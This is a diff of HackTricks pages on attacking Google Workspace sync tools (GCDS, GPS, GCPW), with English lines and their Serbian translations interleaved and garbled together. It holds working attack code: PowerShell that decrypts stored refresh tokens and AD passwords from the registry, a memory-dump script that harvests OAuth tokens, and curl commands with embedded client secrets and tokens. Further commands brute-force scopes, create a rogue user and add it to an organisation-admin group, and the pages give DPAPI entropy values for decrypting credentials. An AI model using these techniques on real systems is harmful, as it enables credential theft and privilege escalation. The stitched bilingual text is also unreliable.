Na [**https://admin.google.com**/](https://admin.google.com), možda ćete moći da modifikujete podešavanja Workspace-a cele organizacije ako imate dovoljno dozvola.
You can also find emails by searching through all the user's invoices in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch)
Takođe možete pronaći mejlove pretražujući sve korisnikove fakture na [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch)
## References
@@ -72,7 +72,3 @@ You can also find emails by searching through all the user's invoices in [**http
- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
{{#include ../../banners/hacktricks-training.md}}
@@ -4,12 +4,12 @@
## GCPW - Google Credential Provider for Windows
This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will store **tokens** to access Google Workspace in some places in the PC: Disk, memory & the registry... it's even possible to obtain the **clear text password**.
Ovo je jedinstveno prijavljivanje koje Google Workspace pruža kako bi korisnici mogli da se prijave na svojim Windows PC-ima koristeći **svoje Workspace akreditive**. Štaviše, ovo će čuvati **tokene** za pristup Google Workspace na nekim mestima na PC-u: Disk, memorija i registri... čak je moguće dobiti **lozinku u čistom tekstu**.
> [!TIP]
> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**.
> Imajte na umu da [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) može da detektuje **GCPW**, dobije informacije o konfiguraciji i **čak tokene**.
Find more information about this in:
Pronađite više informacija o ovome u:
{{#ref}}
gcpw-google-credential-provider-for-windows.md
@@ -17,14 +17,14 @@ gcpw-google-credential-provider-for-windows.md
## GCSD - Google Cloud Directory Sync
This is a tool that can be used to **sync your active directory users and groups to your Workspace** (and not the other way around by the time of this writing).
Ovo je alat koji se može koristiti za **sinhronizaciju vaših korisnika i grupa aktivnog direktorijuma sa vašim Workspace-om** (a ne obrnuto u vreme pisanja ovog teksta).
It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time.
Zanimljivo je jer je to alat koji će zahtevati **akreditive superkorisnika Workspace-a i privilegovanog AD korisnika**. Tako da bi moglo biti moguće pronaći ga unutar domen servera koji bi povremeno sinhronizovao korisnike.
> [!TIP]
> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**.
> Imajte na umu da [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) može da detektuje **GCDS**, dobije informacije o konfiguraciji i **čak lozinke i enkriptovane akreditive**.
Find more information about this in:
Pronađite više informacija o ovome u:
{{#ref}}
gcds-google-cloud-directory-sync.md
@@ -32,14 +32,14 @@ gcds-google-cloud-directory-sync.md
## GPS - Google Password Sync
This is the binary and service that Google offers in order to **keep synchronized the passwords of the users between the AD** and Workspace. Every-time a user changes his password in the AD, it's set to Google.
Ovo je binarni fajl i servis koji Google nudi kako bi **održao sinhronizovane lozinke korisnika između AD-a** i Workspace-a. Svaki put kada korisnik promeni svoju lozinku u AD-u, ona se postavlja na Google.
It gets installed in `C:\Program Files\Google\Password Sync` where you can find the binary `PasswordSync.exe` to configure it and `password_sync_service.exe` (the service that will continue running).
Instalira se u `C:\Program Files\Google\Password Sync` gde možete pronaći binarni fajl `PasswordSync.exe` za konfiguraciju i `password_sync_service.exe` (servis koji će nastaviti da radi).
> [!TIP]
> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even the passwords and encrypted credentials**.
> Imajte na umu da [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) može da detektuje **GPS**, dobije informacije o konfiguraciji i **čak lozinke i enkriptovane akreditive**.
Find more information about this in:
Pronađite više informacija o ovome u:
{{#ref}}
gps-google-password-sync.md
@@ -47,16 +47,12 @@ gps-google-password-sync.md
## Admin Directory Sync
The main difference between this way to synchronize users with GCDS is that GCDS is done manually with some binaries you need to download and run while **Admin Directory Sync is serverless** managed by Google in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
Glavna razlika između ovog načina sinhronizacije korisnika sa GCDS je ta što se GCDS radi ručno sa nekim binarnim fajlovima koje treba preuzeti i pokrenuti dok je **Admin Directory Sync bezserverski** i upravlja ga Google na [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
Find more information about this in:
Pronađite više informacija o ovome u:
{{#ref}}
gws-admin-directory-sync.md
{{#endref}}
{{#include ../../../banners/hacktricks-training.md}}
@@ -2,30 +2,29 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Osnovne informacije
This is a tool that can be used to **sync your active directory users and groups to your Workspace** (and not the other way around by the time of this writing).
Ovo je alat koji se može koristiti za **sinhronizaciju vaših korisnika i grupa aktivnog direktorijuma sa vašim Workspace** (a ne obrnuto u vreme pisanja ovog teksta).
It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time.
Zanimljivo je jer je to alat koji će zahtevati **akreditive superkorisnika Workspace-a i privilegovanog AD korisnika**. Tako da bi moglo biti moguće pronaći ga unutar domen servera koji bi povremeno sinhronizovao korisnike.
> [!NOTE]
> To perform a **MitM** to the **`config-manager.exe`** binary just add the following line in the `config.manager.vmoptions` file: **`-Dcom.sun.net.ssl.checkRevocation=false`**
> Da biste izvršili **MitM** na **`config-manager.exe`** binarnu datoteku, jednostavno dodajte sledeću liniju u `config.manager.vmoptions` datoteku: **`-Dcom.sun.net.ssl.checkRevocation=false`**
> [!TIP]
> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**.
> Imajte na umu da [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) može da detektuje **GCDS**, dobije informacije o konfiguraciji i **čak i lozinke i enkriptovane akreditive**.
Also note that GCDS won't synchronize passwords from AD to Workspace. If something it'll just generate random passwords for newly created users in Workspace as you can see in the following image:
Takođe imajte na umu da GCDS neće sinhronizovati lozinke iz AD u Workspace. Ako nešto, samo će generisati nasumične lozinke za novokreirane korisnike u Workspace-u, kao što možete videti na sledećoj slici:
<figure><img src="../../../images/telegram-cloud-photo-size-4-5780773316536156543-x.jpg" alt="" width="515"><figcaption></figcaption></figure>
### GCDS - Disk Tokens & AD Credentials
### GCDS - Disk tokeni i AD akreditive
The binary `config-manager.exe` (the main GCDS binary with GUI) will store the configured Active Directory credentials, the refresh token and the access by default in a **xml file** in the folder **`C:\Program Files\Google Cloud Directory Sync`** in a file called **`Untitled-1.xml`** by default. Although it could also be saved in the `Documents` of the user or in **any other folder**.
Binarna datoteka `config-manager.exe` (glavna GCDS binarna datoteka sa GUI) će po defaultu čuvati konfigurirane akreditive aktivnog direktorijuma, osvežavajući token i pristup u **xml datoteci** u folderu **`C:\Program Files\Google Cloud Directory Sync`** u datoteci pod nazivom **`Untitled-1.xml`**. Iako bi takođe mogla biti sačuvana u `Dokumentima` korisnika ili u **bilo kojem drugom folderu**.
Moreover, the registry **`HKCU\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\ui`** inside the key **`open.recent`** contains the paths to all the recently opened configuration files (xmls). So it's possible to **check it to find them**.
The most interesting information inside the file would be:
Štaviše, registar **`HKCU\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\ui`** unutar ključa **`open.recent`** sadrži putanje do svih nedavno otvorenih konfiguracionih datoteka (xml). Tako da je moguće **proveriti to da ih pronađete**.
Najzanimljivije informacije unutar datoteke bi bile:
```xml
[...]
<loginMethod>OAUTH2</loginMethod>
@@ -50,13 +49,11 @@ The most interesting information inside the file would be:
<authCredentialsEncrypted>XMmsPMGxz7nkpChpC7h2ag==</authCredentialsEncrypted>
[...]
```
Note how the **refresh** **token** and the **password** of the user are **encrypted** using **AES CBC** with a randomly generated key and IV stored in **`HKEY_CURRENT_USER\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util`** (wherever the **`prefs`** Java library store the preferences) in the string keys **`/Encryption/Policy/V2.iv`** and **`/Encryption/Policy/V2.key`** stored in base64.
Napomena kako su **refresh** **token** i **password** korisnika **šifrovani** koristeći **AES CBC** sa nasumično generisanim ključem i IV koji su sačuvani u **`HKEY_CURRENT_USER\SOFTWARE\JavaSoft\Prefs\com\google\usersyncapp\util`** (gde god **`prefs`** Java biblioteka čuva podešavanja) u string ključevima **`/Encryption/Policy/V2.iv`** i **`/Encryption/Policy/V2.key`** sačuvanim u base64.
<details>
<summary>Powershell script to decrypt the refresh token and the password</summary>
<summary>Powershell skripta za dešifrovanje refresh tokena i lozinke</summary>
```powershell
# Paths and key names
$xmlConfigPath = "C:\Users\c\Documents\conf.xml"
@@ -66,34 +63,34 @@ $keyKeyName = "/Encryption/Policy/V2.key"
# Open the registry key
try {
$regKey = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey($regPath)
if (-not $regKey) {
Throw "Registry key not found: HKCU\$regPath"
}
$regKey = [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey($regPath)
if (-not $regKey) {
Throw "Registry key not found: HKCU\$regPath"
}
}
catch {
Write-Error "Failed to open registry key: $_"
exit
Write-Error "Failed to open registry key: $_"
exit
}
# Get Base64-encoded IV and Key from the registry
try {
$ivBase64 = $regKey.GetValue($ivKeyName)
$ivBase64 = $ivBase64 -replace '/', ''
$ivBase64 = $ivBase64 -replace '\\', '/'
if (-not $ivBase64) {
Throw "IV not found in registry"
}
$keyBase64 = $regKey.GetValue($keyKeyName)
$keyBase64 = $keyBase64 -replace '/', ''
$keyBase64 = $keyBase64 -replace '\\', '/'
if (-not $keyBase64) {
Throw "Key not found in registry"
}
$ivBase64 = $regKey.GetValue($ivKeyName)
$ivBase64 = $ivBase64 -replace '/', ''
$ivBase64 = $ivBase64 -replace '\\', '/'
if (-not $ivBase64) {
Throw "IV not found in registry"
}
$keyBase64 = $regKey.GetValue($keyKeyName)
$keyBase64 = $keyBase64 -replace '/', ''
$keyBase64 = $keyBase64 -replace '\\', '/'
if (-not $keyBase64) {
Throw "Key not found in registry"
}
}
catch {
Write-Error "Failed to read registry values: $_"
exit
Write-Error "Failed to read registry values: $_"
exit
}
$regKey.Close()
@@ -118,25 +115,25 @@ $encryptedPasswordBytes = [Convert]::FromBase64String($encryptedPasswordBase64)
# Function to decrypt data using AES CBC
Function Decrypt-Data($cipherBytes, $keyBytes, $ivBytes) {
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aes.KeySize = 256
$aes.BlockSize = 128
$aes.Key = $keyBytes
$aes.IV = $ivBytes
$aes = [System.Security.Cryptography.Aes]::Create()
$aes.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$aes.KeySize = 256
$aes.BlockSize = 128
$aes.Key = $keyBytes
$aes.IV = $ivBytes
$decryptor = $aes.CreateDecryptor()
$memoryStream = New-Object System.IO.MemoryStream
$cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
$cryptoStream.Write($cipherBytes, 0, $cipherBytes.Length)
$cryptoStream.FlushFinalBlock()
$plaintextBytes = $memoryStream.ToArray()
$decryptor = $aes.CreateDecryptor()
$memoryStream = New-Object System.IO.MemoryStream
$cryptoStream = New-Object System.Security.Cryptography.CryptoStream($memoryStream, $decryptor, [System.Security.Cryptography.CryptoStreamMode]::Write)
$cryptoStream.Write($cipherBytes, 0, $cipherBytes.Length)
$cryptoStream.FlushFinalBlock()
$plaintextBytes = $memoryStream.ToArray()
$cryptoStream.Close()
$memoryStream.Close()
$cryptoStream.Close()
$memoryStream.Close()
return $plaintextBytes
return $plaintextBytes
}
# Decrypt the values
@@ -150,23 +147,21 @@ $decryptedPassword = [System.Text.Encoding]::UTF8.GetString($decryptedPasswordBy
Write-Host "Decrypted Refresh Token: $refreshToken"
Write-Host "Decrypted Password: $decryptedPassword"
```
</details>
> [!NOTE]
> Note that it's possible to check this information checking the java code of **`DirSync.jar`** from **`C:\Program Files\Google Cloud Directory Sync`** searching for the string `exportkeys` (as thats the cli param that the binary `upgrade-config.exe` expects to dump the keys).
> Imajte na umu da je moguće proveriti ove informacije pregledanjem java koda **`DirSync.jar`** iz **`C:\Program Files\Google Cloud Directory Sync`** pretražujući string `exportkeys` (jer je to cli parametar koji binarni `upgrade-config.exe` očekuje da izvuče ključeve).
Instead of using the powershell script, it's also possible to use the binary **`:\Program Files\Google Cloud Directory Sync\upgrade-config.exe`** with the param `-exportKeys` and get the **Key** and **IV** from the registry in hex and then just use some cyberchef with AES/CBC and that key and IV to decrypt the info.
Umesto korišćenja powershell skripte, takođe je moguće koristiti binarni **`:\Program Files\Google Cloud Directory Sync\upgrade-config.exe`** sa parametrom `-exportKeys` i dobiti **Key** i **IV** iz registra u heksadecimalnom formatu, a zatim jednostavno koristiti neki cyberchef sa AES/CBC i tim ključem i IV za dešifrovanje informacija.
### GCDS - Dumping tokens from memory
### GCDS - Ispisivanje tokena iz memorije
Just like with GCPW, it's possible to dump the memory of the process of the `config-manager.exe` process (it's the name of the GCDS main binary with GUI) and you will be able to find refresh and access tokens (if they have been generated already).\
I guess you could also find the AD configured credentials.
Baš kao i sa GCPW, moguće je ispisati memoriju procesa `config-manager.exe` (to je naziv glavnog binarnog GCDS-a sa GUI) i moći ćete da pronađete refresh i access tokene (ako su već generisani).\
Pretpostavljam da biste takođe mogli pronaći AD konfigurisane kredencijale.
<details>
<summary>Dump config-manager.exe processes and search tokens</summary>
<summary>Ispisivanje procesa config-manager.exe i pretraga tokena</summary>
```powershell
# Define paths for Procdump and Strings utilities
$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe"
@@ -175,13 +170,13 @@ $dumpFolder = "C:\Users\Public\dumps"
# Regular expressions for tokens
$tokenRegexes = @(
"ya29\.[a-zA-Z0-9_\.\-]{50,}",
"1//[a-zA-Z0-9_\.\-]{50,}"
"ya29\.[a-zA-Z0-9_\.\-]{50,}",
"1//[a-zA-Z0-9_\.\-]{50,}"
)
# Create a directory for the dumps if it doesn't exist
if (!(Test-Path $dumpFolder)) {
New-Item -Path $dumpFolder -ItemType Directory
New-Item -Path $dumpFolder -ItemType Directory
}
# Get all Chrome process IDs
@@ -189,96 +184,92 @@ $chromeProcesses = Get-Process -Name "config-manager" -ErrorAction SilentlyConti
# Dump each Chrome process
foreach ($processId in $chromeProcesses) {
Write-Output "Dumping process with PID: $processId"
& $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
Write-Output "Dumping process with PID: $processId"
& $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
}
# Extract strings and search for tokens in each dump
Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {
$dumpFile = $_.FullName
$baseName = $_.BaseName
$asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
$unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"
$dumpFile = $_.FullName
$baseName = $_.BaseName
$asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
$unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"
Write-Output "Extracting strings from $dumpFile"
& $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
& $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile
Write-Output "Extracting strings from $dumpFile"
& $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
& $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile
$outputFiles = @($asciiStringsFile, $unicodeStringsFile)
$outputFiles = @($asciiStringsFile, $unicodeStringsFile)
foreach ($file in $outputFiles) {
foreach ($regex in $tokenRegexes) {
foreach ($file in $outputFiles) {
foreach ($regex in $tokenRegexes) {
$matches = Select-String -Path $file -Pattern $regex -AllMatches
$matches = Select-String -Path $file -Pattern $regex -AllMatches
$uniqueMatches = @{}
$uniqueMatches = @{}
foreach ($matchInfo in $matches) {
foreach ($match in $matchInfo.Matches) {
$matchValue = $match.Value
if (-not $uniqueMatches.ContainsKey($matchValue)) {
$uniqueMatches[$matchValue] = @{
LineNumber = $matchInfo.LineNumber
LineText = $matchInfo.Line.Trim()
FilePath = $matchInfo.Path
}
}
}
}
foreach ($matchInfo in $matches) {
foreach ($match in $matchInfo.Matches) {
$matchValue = $match.Value
if (-not $uniqueMatches.ContainsKey($matchValue)) {
$uniqueMatches[$matchValue] = @{
LineNumber = $matchInfo.LineNumber
LineText = $matchInfo.Line.Trim()
FilePath = $matchInfo.Path
}
}
}
}
foreach ($matchValue in $uniqueMatches.Keys) {
$info = $uniqueMatches[$matchValue]
Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
}
}
foreach ($matchValue in $uniqueMatches.Keys) {
$info = $uniqueMatches[$matchValue]
Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
}
}
Write-Output ""
}
Write-Output ""
}
}
Remove-Item -Path $dumpFolder -Recurse -Force
```
</details>
### GCDS - Generating access tokens from refresh tokens
Using the refresh token it's possible to generate access tokens using it and the client ID and client secret specified in the following command:
### GCDS - Generisanje pristupnih tokena iz osvežavajućih tokena
Korišćenjem osvežavajućeg tokena moguće je generisati pristupne tokene koristeći ga i ID klijenta i tajnu klijenta navedene u sledećoj komandi:
```bash
curl -s --data "client_id=118556098869.apps.googleusercontent.com" \
--data "client_secret=Co-LoSjkPcQXD9EjJzWQcgpy" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03gQU44mwVnU4CDHYE736TGMSNwF-L9IrTuikNFVZQ3sBxshrJaki7QvpHZQMeANHrF0eIPebz0dz0S987354AuSdX38LySlWflI" \
https://www.googleapis.com/oauth2/v4/token
--data "client_secret=Co-LoSjkPcQXD9EjJzWQcgpy" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03gQU44mwVnU4CDHYE736TGMSNwF-L9IrTuikNFVZQ3sBxshrJaki7QvpHZQMeANHrF0eIPebz0dz0S987354AuSdX38LySlWflI" \
https://www.googleapis.com/oauth2/v4/token
```
### GCDS - Scopes
> [!NOTE]
> Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**.
> Imajte na umu da čak i kada imate refresh token, nije moguće zatražiti bilo koji scope za access token jer možete zatražiti samo **scope-ove koje podržava aplikacija u kojoj generišete access token**.
>
> Also, the refresh token is not valid in every application.
> Takođe, refresh token nije važeći u svakoj aplikaciji.
By default GCSD won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the `refresh_token` to generate an `access_token`:
Podrazumevano, GCSD neće imati pristup kao korisnik svim mogućim OAuth scope-ovima, pa možemo koristiti sledeći skript da pronađemo scope-ove koji se mogu koristiti sa `refresh_token` za generisanje `access_token`:
<details>
<summary>Bash script to brute-force scopes</summary>
```bash
curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do
echo -ne "Testing $scope \r"
if ! curl -s --data "client_id=118556098869.apps.googleusercontent.com" \
--data "client_secret=Co-LoSjkPcQXD9EjJzWQcgpy" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03PR0VQOSCjS1CgYIARAAGAMSNwF-L9Ir5b_vOaCmnXzla0nL7dX7TJJwFcvrfgDPWI-j19Z4luLpYfLyv7miQyvgyXjGEXt-t0A" \
--data "scope=$scope" \
https://www.googleapis.com/oauth2/v4/token 2>&1 | grep -q "error_description"; then
echo ""
echo $scope
echo $scope >> /tmp/valid_scopes.txt
fi
echo -ne "Testing $scope \r"
if ! curl -s --data "client_id=118556098869.apps.googleusercontent.com" \
--data "client_secret=Co-LoSjkPcQXD9EjJzWQcgpy" \
--data "grant_type=refresh_token" \
--data "refresh_token=1//03PR0VQOSCjS1CgYIARAAGAMSNwF-L9Ir5b_vOaCmnXzla0nL7dX7TJJwFcvrfgDPWI-j19Z4luLpYfLyv7miQyvgyXjGEXt-t0A" \
--data "scope=$scope" \
https://www.googleapis.com/oauth2/v4/token 2>&1 | grep -q "error_description"; then
echo ""
echo $scope
echo $scope >> /tmp/valid_scopes.txt
fi
done
echo ""
@@ -287,11 +278,9 @@ echo "Valid scopes:"
cat /tmp/valid_scopes.txt
rm /tmp/valid_scopes.txt
```
</details>
And this is the output I got at the time of the writing:
I ovo je izlaz koji sam dobio u vreme pisanja:
```
https://www.googleapis.com/auth/admin.directory.group
https://www.googleapis.com/auth/admin.directory.orgunit
@@ -302,43 +291,36 @@ https://www.googleapis.com/auth/apps.groups.settings
https://www.googleapis.com/auth/apps.licensing
https://www.googleapis.com/auth/contacts
```
#### Create a user and add it into the group `gcp-organization-admins` to try to escalate in GCP
#### Kreirajte korisnika i dodajte ga u grupu `gcp-organization-admins` da biste pokušali da eskalirate u GCP
```bash
# Create new user
curl -X POST \
'https://admin.googleapis.com/admin/directory/v1/users' \
-H 'Authorization: Bearer <ACCESS_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{
"primaryEmail": "deleteme@domain.com",
"name": {
"givenName": "Delete",
"familyName": "Me"
},
"password": "P4ssw0rdStr0ng!",
"changePasswordAtNextLogin": false
}'
'https://admin.googleapis.com/admin/directory/v1/users' \
-H 'Authorization: Bearer <ACCESS_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{
"primaryEmail": "deleteme@domain.com",
"name": {
"givenName": "Delete",
"familyName": "Me"
},
"password": "P4ssw0rdStr0ng!",
"changePasswordAtNextLogin": false
}'
# Add to group
curl -X POST \
'https://admin.googleapis.com/admin/directory/v1/groups/gcp-organization-admins@domain.com/members' \
-H 'Authorization: Bearer <ACCESS_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{
"email": "deleteme@domain.com",
"role": "OWNER"
}'
'https://admin.googleapis.com/admin/directory/v1/groups/gcp-organization-admins@domain.com/members' \
-H 'Authorization: Bearer <ACCESS_TOKEN>' \
-H 'Content-Type: application/json' \
-d '{
"email": "deleteme@domain.com",
"role": "OWNER"
}'
# You could also change the password of a user for example
```
> [!CAUTION]
> It's not possible to give the new user the Super Amin role because the **refresh token doesn't have enough scopes** to give the required privileges.
> Nije moguće dodeliti novom korisniku Super Amin ulogu jer **osveženi token nema dovoljno opsega** da dodeli potrebne privilegije.
{{#include ../../../banners/hacktricks-training.md}}
@@ -2,57 +2,56 @@
{{#include ../../../banners/hacktricks-training.md}}
## Basic Information
## Osnovne informacije
This is the binary and service that Google offers in order to **keep synchronized the passwords of the users between the AD** and Workspace. Every-time a user changes his password in the AD, it's set to Google.
Ovo je binarni fajl i servis koji Google nudi kako bi **održao sinhronizovane lozinke korisnika između AD** i Workspace-a. Svaki put kada korisnik promeni svoju lozinku u AD-u, ona se postavlja na Google.
It gets installed in `C:\Program Files\Google\Password Sync` where you can find the binary `PasswordSync.exe` to configure it and `password_sync_service.exe` (the service that will continue running).
Instalira se u `C:\Program Files\Google\Password Sync` gde možete pronaći binarni fajl `PasswordSync.exe` za konfiguraciju i `password_sync_service.exe` (servis koji će nastaviti da radi).
### GPS - Configuration
### GPS - Konfiguracija
To configure this binary (and service), it's needed to **give it access to a Super Admin principal in Workspace**:
Da biste konfigurisali ovaj binarni fajl (i servis), potrebno je **dati mu pristup Super Admin principalu u Workspace-u**:
- Login via **OAuth** with Google and then it'll **store a token in the registry (encrypted)**
- Only available in Domain Controllers with GUI
- Giving some **Service Account credentials from GCP** (json file) with permissions to **manage the Workspace users**
- Very bad idea as those credentials never expired and could be misused
- Very bad idea give a SA access over workspace as the SA could get compromised in GCP and it'll possible to pivot to Workspace
- Google require it for domain controlled without GUI
- These creds are also stored in the registry
- Prijavite se putem **OAuth** sa Google-om i zatim će **sačuvati token u registru (kriptovan)**
- Dostupno samo na kontrolerima domena sa GUI
- Dati neke **akreditivne podatke Servisnog naloga iz GCP** (json fajl) sa dozvolama da **upravljaju korisnicima Workspace-a**
- Veoma loša ideja jer ti akreditivi nikada ne isteknu i mogu se zloupotrebiti
- Veoma loša ideja dati SA pristup preko workspace-a jer bi SA mogao biti kompromitovan u GCP-u i moguće je prebaciti se na Workspace
- Google to zahteva za kontrolisane domene bez GUI
- Ovi akreditivi se takođe čuvaju u registru
Regarding AD, it's possible to indicate it to use the current **applications context, anonymous or some specific credentials**. If the credentials option is selected, the **username** is stored inside a file in the **disk** and the **password** is **encrypted** and stored in the **registry**.
Što se tiče AD-a, moguće je naznačiti da koristi trenutni **kontekst aplikacija, anonimno ili neke specifične akreditive**. Ako je opcija akreditiva izabrana, **korisničko ime** se čuva unutar fajla na **disku** a **lozinka** je **kriptovana** i čuva se u **registru**.
### GPS - Dumping password and token from disk
### GPS - Ispisivanje lozinke i tokena sa diska
> [!TIP]
> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even decrypt the password and token**.
> Imajte na umu da [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) može da detektuje **GPS**, dobije informacije o konfiguraciji i **čak dekriptuje lozinku i token**.
In the file **`C:\ProgramData\Google\Google Apps Password Sync\config.xml`** it's possible to find part of the configuration like the **`baseDN`** of the AD configured and the **`username`** whose credentials are being used.
U fajlu **`C:\ProgramData\Google\Google Apps Password Sync\config.xml`** moguće je pronaći deo konfiguracije kao što je **`baseDN`** AD-a koji je konfigurisan i **`username`** čiji se akreditivi koriste.
In the registry **`HKLM\Software\Google\Google Apps Password Sync`** it's possible to find the **encrypted refresh token** and the **encrypted password** for the AD user (if any). Moreover, if instead of an token, some **SA credentials** are used, it's also possible to find those encrypted in that registry address. The **values** inside this registry are only **accessible** by **Administrators**.
U registru **`HKLM\Software\Google\Google Apps Password Sync`** moguće je pronaći **kriptovani refresh token** i **kriptovanu lozinku** za AD korisnika (ako ih ima). Štaviše, ako se umesto tokena koriste neki **SA akreditivi**, takođe je moguće pronaći te kriptovane u toj adresi registra. **Vrednosti** unutar ovog registra su dostupne samo **Administratorima**.
The encrypted **password** (if any) is inside the key **`ADPassword`** and is encrypted using **`CryptProtectData`** API. To decrypt it, you need to be the same user as the one that configured the password sync and use this **entropy** when using the **`CryptUnprotectData`**: `byte[] entropyBytes = new byte[] { 0xda, 0xfc, 0xb2, 0x8d, 0xa0, 0xd5, 0xa8, 0x7c, 0x88, 0x8b, 0x29, 0x51, 0x34, 0xcb, 0xae, 0xe9 };`
Kriptovana **lozinka** (ako je ima) se nalazi unutar ključa **`ADPassword`** i kriptovana je koristeći **`CryptProtectData`** API. Da biste je dekriptovali, morate biti isti korisnik kao onaj koji je konfigurisao sinhronizaciju lozinke i koristiti ovu **entropiju** prilikom korišćenja **`CryptUnprotectData`**: `byte[] entropyBytes = new byte[] { 0xda, 0xfc, 0xb2, 0x8d, 0xa0, 0xd5, 0xa8, 0x7c, 0x88, 0x8b, 0x29, 0x51, 0x34, 0xcb, 0xae, 0xe9 };`
The encrypted token (if any) is inside the key **`AuthToken`** and is encrypted using **`CryptProtecData`** API. To decrypt it, you need to be the same user as the one that configured the password sync and use this **entropy** when using the **`CryptUnprotectData`**: `byte[] entropyBytes = new byte[] { 0x00, 0x14, 0x0b, 0x7e, 0x8b, 0x18, 0x8f, 0x7e, 0xc5, 0xf2, 0x2d, 0x6e, 0xdb, 0x95, 0xb8, 0x5b };`\
Moreover, it's also encoded using base32hex with the dictionary **`0123456789abcdefghijklmnopqrstv`**.
Kriptovani token (ako ga ima) se nalazi unutar ključa **`AuthToken`** i kriptovan je koristeći **`CryptProtectData`** API. Da biste ga dekriptovali, morate biti isti korisnik kao onaj koji je konfigurisao sinhronizaciju lozinke i koristiti ovu **entropiju** prilikom korišćenja **`CryptUnprotectData`**: `byte[] entropyBytes = new byte[] { 0x00, 0x14, 0x0b, 0x7e, 0x8b, 0x18, 0x8f, 0x7e, 0xc5, 0xf2, 0x2d, 0x6e, 0xdb, 0x95, 0xb8, 0x5b };`\
Štaviše, takođe je kodiran koristeći base32hex sa rečnikom **`0123456789abcdefghijklmnopqrstv`**.
The entropy values were found by using the tool . It was configured to monitor the calls to **`CryptUnprotectData`** and **`CryptProtectData`** and then the tool was used to launch and monitor `PasswordSync.exe` which will decrypt the configured password and auth token at the beginning and the tool will **show the values for the entropy used** in both cases:
Vrednosti entropije su pronađene korišćenjem alata. Konfigurisano je da prati pozive ka **`CryptUnprotectData`** i **`CryptProtectData`** i zatim je alat korišćen za pokretanje i praćenje `PasswordSync.exe` koji će dekriptovati konfigurisanju lozinku i auth token na početku, a alat će **prikazati vrednosti za korišćenu entropiju** u oba slučaja:
<figure><img src="../../../images/telegram-cloud-photo-size-4-5782633230648853886-y.jpg" alt=""><figcaption></figcaption></figure>
Note that it's also possible to see the **decrypted** values in the input or output of the calls to these APIs also (in case at some point Winpeas stop working).
Imajte na umu da je takođe moguće videti **dekriptovane** vrednosti u ulazu ili izlazu poziva ovih API-ja takođe (u slučaju da u nekom trenutku Winpeas prestane da radi).
